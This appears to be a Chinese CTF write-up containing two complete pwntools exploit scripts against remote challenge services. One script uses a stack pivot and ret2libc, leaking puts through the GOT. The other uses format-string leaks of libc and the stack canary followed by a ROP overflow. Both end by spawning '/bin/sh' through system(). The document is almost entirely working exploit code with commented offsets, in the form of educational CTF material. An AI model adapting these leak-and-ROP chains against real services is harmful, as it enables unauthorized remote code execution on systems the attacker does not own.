Move

栈迁移+ret2libc

#!/usr/bin/python2
from pwn import *

io = remote('123.56.25.124', 22278)
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)


def rc(n):
    """Read exactly *n* bytes from the connection."""
    return io.recv(n)


def sa(a, b):
    """Wait until *a* has been received, then send *b*."""
    return io.sendafter(a, b)


def ia():
    """Hand the connection over to the interactive console."""
    return io.interactive()


def uu64(x):
    """Unpack a 64-bit word from *x* after zero-padding it to 8 bytes.

    Endianness follows the pwntools ``context`` (little-endian by default).
    """
    return u64(x.ljust(8, b'\x00'))

# Addresses taken from the challenge binary as given in the writeup. They are
# absolute (0x40xxxx), so the binary is presumably loaded without PIE — confirm
# against `checksec` before reusing these values anywhere.
pop_rdi = 0x0000000000401353
got = 0x0000000000404018   # GOT slot whose contents are leaked below
plt = 0x0000000000401080   # PLT entry used to print it (matches the puts symbol used at the leak)
main = 0x0000000000401264  # re-entry point so the program can be driven a second time
# First stage: leak one GOT entry, then return to main.
pld = flat([
    pop_rdi,
    got,
    plt,
    main
])
sa('lets travel again!\n', pld)
# The prompt text is reproduced exactly as the service prints it ("setp").
sa('Input your setp number', p32(0x12345678))
# Offset-keyed payload: 0x30 and 0x38 look like the saved-frame-pointer and
# return-address slots that redirect execution to the chain above (the
# "栈迁移" / stack pivot named in the title) — confirm against the binary.
pld = flat({
    0x38-8: 0x00000000004050A0 - 8,
    0x38: 0x00000000004012E0,
})
sa('TaiCooLa', pld)
# Only 6 bytes of the leaked pointer are read (user-space addresses fit in 48 bits);
# uu64 pads them to a full word. libc_base is derived from the puts symbol offset.
libc_base = uu64(rc(6)) - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
# NOTE: `.next()` is Python 2 only; under Python 3 this would be next(...).
binsh_addr = libc_base + libc.search('/bin/sh').next()

# Second stage: classic ret2libc call into system("/bin/sh").
pld = flat([
    pop_rdi,
    binsh_addr,
    sys_addr,
    main
])
sa('lets travel again!\n', pld)
ia()

Pwthon

格式化字符串+栈溢出

#!/usr/bin/python2
from pwn import *

io = remote('123.56.9.101', 26410)
context.bits = 64
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)


def ru(x):
    """Receive up to *x*, returning the data with the delimiter dropped."""
    return io.recvuntil(x, drop = True)


def sd(x):
    """Send *x* as-is (no trailing newline)."""
    return io.send(x)


def sl(x):
    """Send *x* followed by a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait until *a* has been received, then send *b*."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait until *a* has been received, then send *b* plus a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the interactive console."""
    return io.interactive()

def menu(choice):
    """Answer the ``> `` prompt with *choice* (converted to a string) and a newline."""
    io.sendlineafter('> ', str(choice))

menu(0)
ru('Give you a gift')
# The subtrahend is the distance between a pointer printed by the service and
# its mapping base, recorded from one debugging session; it only holds for the
# exact build the writeup targeted.
app_base = int(ru('\n'), 16) - (0x7fd4ccdf88b0 - 0x7fd4ccdf2000)
# Format string of 0x1a `%llx` conversions; the program echoes its stack words.
sd('%llx,' * 0x1a)
sl('')
data = ru('\n')
# Slice picks the last 12 hex digits of the echoed line; the offset pair again
# comes from a recorded run. Both slices below assume a fixed output layout.
libc_base = int(data[-13:-1], 16) - (0x7f54772a6cdd - 0x7f5477197000)
sys_addr = libc_base + libc.sym['system']
# NOTE: `.next()` is Python 2 only; under Python 3 this would be next(...).
binsh_addr = libc_base + libc.search('/bin/sh').next()

menu(0)
ru('Give you a gift')
data = ru('\n')   # value is overwritten below without being used
sd('%lx,' * 50)
sl('')
data = ru('>')
# 16 hex digits = one 64-bit stack word, read as the stack canary.
canary = int(data[-19:-3], 16)
pop_rdi = app_base + 0x0000000000003f8f
ret = app_base + 0x000000000000301a

sl('0')
ru('Give you a gift')
sd('a')
# Offset-keyed buffer: the canary is restored at 0x108, then the chain
# (padding `ret` gadgets, pop rdi, "/bin/sh", system) follows at 0x110..0x140.
pld = flat({
    0x108: canary,
    0x110: ret,
    0x118: ret,
    0x120: ret,
    0x128: ret,
    0x130: pop_rdi,
    0x138: binsh_addr,
    0x140: sys_addr,
})
sd(pld)
ia()

一开始脑抽一直想着把cpython的so文件还原成python代码（一血又没了）